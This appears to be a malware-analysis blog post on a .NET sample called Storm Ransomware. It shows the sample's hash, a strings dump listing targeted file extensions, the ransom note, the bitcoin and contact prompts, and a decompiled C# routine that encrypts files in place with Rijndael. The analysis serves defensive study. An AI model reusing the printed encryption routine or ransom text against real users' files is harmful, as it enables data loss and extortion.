Today we are analysing a malware sample and its hash is 791b700810e356339066b67f2f4febc9089b5541d602946a243dfb15e6f3918e. It is referred as storm ransomware sample.
Storm Ransomware |
The sample is compiled with .net compiler. Here is the snapshot of the .net compiler detected in that file. Reversing that code is very much possible. Let's try on that.
.net compiled |
Interesting strings presence:
0000000052EF 0000004070EF 0 Property can only be set to Nothing
000000005337 000000407137 0 WinForms_RecursiveFormCreate
000000005371 000000407171 0 WinForms_SeeInnerException
0000000053CF 0000004071CF 0 .accdb
0000000053E7 0000004071E7 0 .aepx
00000000547B 00000040727B 0 .class
0000000054FD 0000004072FD 0 .docb
000000005509 000000407309 0 .docm
000000005515 000000407315 0 .docx
00000000552B 00000040732B 0 .dotm
000000005537 000000407337 0 .dotx
000000005593 000000407393 0 .idml
0000000055A9 0000004073A9 0 .indb
0000000055B5 0000004073B5 0 .indd
0000000055C1 0000004073C1 0 .indl
0000000055CD 0000004073CD 0 .indt
0000000055ED 0000004073ED 0 .java
0000000055F9 0000004073F9 0 .jpeg
000000005623 000000407423 0 .m3u8
000000005693 000000407493 0 .mpeg
00000000578F 00000040758F 0 .potm
00000000579B 00000040759B 0 .potx
0000000057A7 0000004075A7 0 .ppam
0000000057C7 0000004075C7 0 .ppsm
0000000057D3 0000004075D3 0 .ppsx
0000000057E9 0000004075E9 0 .pptm
0000000057F5 0000004075F5 0 .pptx
000000005801 000000407601 0 .prel
00000000580D 00000040760D 0 .prproj
0000000058A3 0000004076A3 0 .sldm
0000000058AF 0000004076AF 0 .sldx
000000005965 000000407765 0 .xlam
000000005999 000000407799 0 .xlsb
0000000059A5 0000004077A5 0 .xlsm
0000000059B1 0000004077B1 0 .xlsx
0000000059C7 0000004077C7 0 .xltm
0000000059D3 0000004077D3 0 .xltx
000000005A0F 00000040780F 0 Label1
000000005A1E 00000040781E 0 _______________________________________________________________________________________
000000005ACE 0000004078CE 0 Button1
000000005AE4 0000004078E4 0 Microsoft Sans Serif
000000005B0E 00000040790E 0 Label2
000000005B1C 00000040791C 0 Storm Ransomware
000000005B3E 00000040793E 0 RichTextBox1
000000005B5A 00000040795A 0 Label3
000000005B68 000000407968 0 Send mony to my bitcoin :
000000005B9C 00000040799C 0 Label5
000000005BB2 0000004079B2 0 Label6
000000005BC0 0000004079C0 0 Contact Me :
000000005BDC 0000004079DC 0 Button2
000000005BF6 0000004079F6 0 TextBox1
000000005C08 000000407A08 0 Form1
000000005C22 000000407A22 0 taskmgr.exe
000000005C3A 000000407A3A 0 ProcessHacker.exe
000000005C5E 000000407A5E 0 FullName
000000005C82 000000407A82 0 Hassan
000000005C90 000000407A90 0 HassanAmiri
000000005CA8 000000407AA8 0 Winrar
000000005CB7 000000407AB7 0 Hello You Are Hacked Now !! All your personal files have been encrypted ! if you want restore your data you have to pay ! Remember you can't restore your data without our decryptor !!!!
000000005E2B 000000407C2B 0 ertyuioppoiuhygtfrdeRFTGYHDEZEFFZEF
000000005E73 000000407C73 0 StormRansomware(at)gmail(dot)com
This list of strings give more details about the file extension or file types targeted by the storm ransomware. And it also give the details on functioning buttons like send moeny to my bitcoin, contact me. It also shown the email id - StormRansomware(at)gmail(dot)com.
Possibly email id and password details will be there. We disassembled the code and please refer the following snapshots of the code:
Email id and password details |
Process detail |
The following code snippet is regards to the cryptography related stuffs:
public static void EC(string nombre, string password)
{
byte[] array = new byte[32];
Encoding.Default.GetBytes(password).CopyTo(array, 0);
RijndaelManaged rijndaelManaged = new RijndaelManaged
{
Mode = CipherMode.CBC,
KeySize = 256,
BlockSize = 256,
Padding = PaddingMode.Zeros
};
byte[] array2 = File.ReadAllBytes(nombre);
MemoryStream memoryStream = new MemoryStream();
try
{
CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(array, array), CryptoStreamMode.Write);
try
{
cryptoStream.Write(array2, 0, array2.Length);
byte[] array3 = memoryStream.ToArray();
byte[] array4 = new byte[checked(array3.Length - 1 + 1)];
array3.CopyTo(array4, 0);
File.WriteAllBytes(nombre, array4);
}
Conclusion:
Currently top AV vendors are detecting this variant. And the famous detection name is MSIL crypter.
Post made by
No comments:
Post a Comment